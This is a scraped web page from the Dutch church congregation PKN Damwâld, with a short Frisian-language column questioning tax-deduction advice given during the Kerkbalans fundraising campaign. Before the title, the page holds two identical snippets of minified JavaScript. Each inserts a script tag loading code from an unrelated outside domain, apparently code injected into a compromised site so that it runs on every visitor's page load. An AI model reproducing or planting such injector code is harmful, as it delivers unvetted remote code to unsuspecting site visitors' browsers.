;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); De blijmoedige gever……. - PKN Damwâld

De blijmoedige gever…….

Gepubliceerd op: maandag 13 maart 2023

Om in saak draaiende te hâlden mat der jild yn’t laatsje komme; in húshâlding, it bedriuw, mar ek de tsjerke kin der net sûnder! Net frjemd dus dat der koartlyn wêr rom omtinken wie foar de aksje Kerkbalans, it jierlikse hichtepunt foar de kommisje fan beheer. Elk jier is it foar dy minsken wêr spannend; helje we genôch jild op om “de saak”draaiende te hâlden. By de lêste Kerkbalans waarden wy oantrúne om “meer te geven maar uiteindelijk minder te betalen”. De (legale-) trúk waard ús oan’e hân fan in praktyk-foarbyld op’e beamer yn tsjerke(!) útlein!! Koartsein kaam it hjir op del; troch in gruttere ôftrekpost betêlje jo minder belêsting, dus bliuwt der netto mear oer om oan de tsjerke (of wat oars) te jaan. It is noch net salang lyn dat de foargonger foarôf-geand oan de kollekte sei;   De Here heeft de blijmoedige gever lief…..!  Wat sil Hy fan in “calculerende gever”en in “calculerende tsjerke” tinke…….?

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns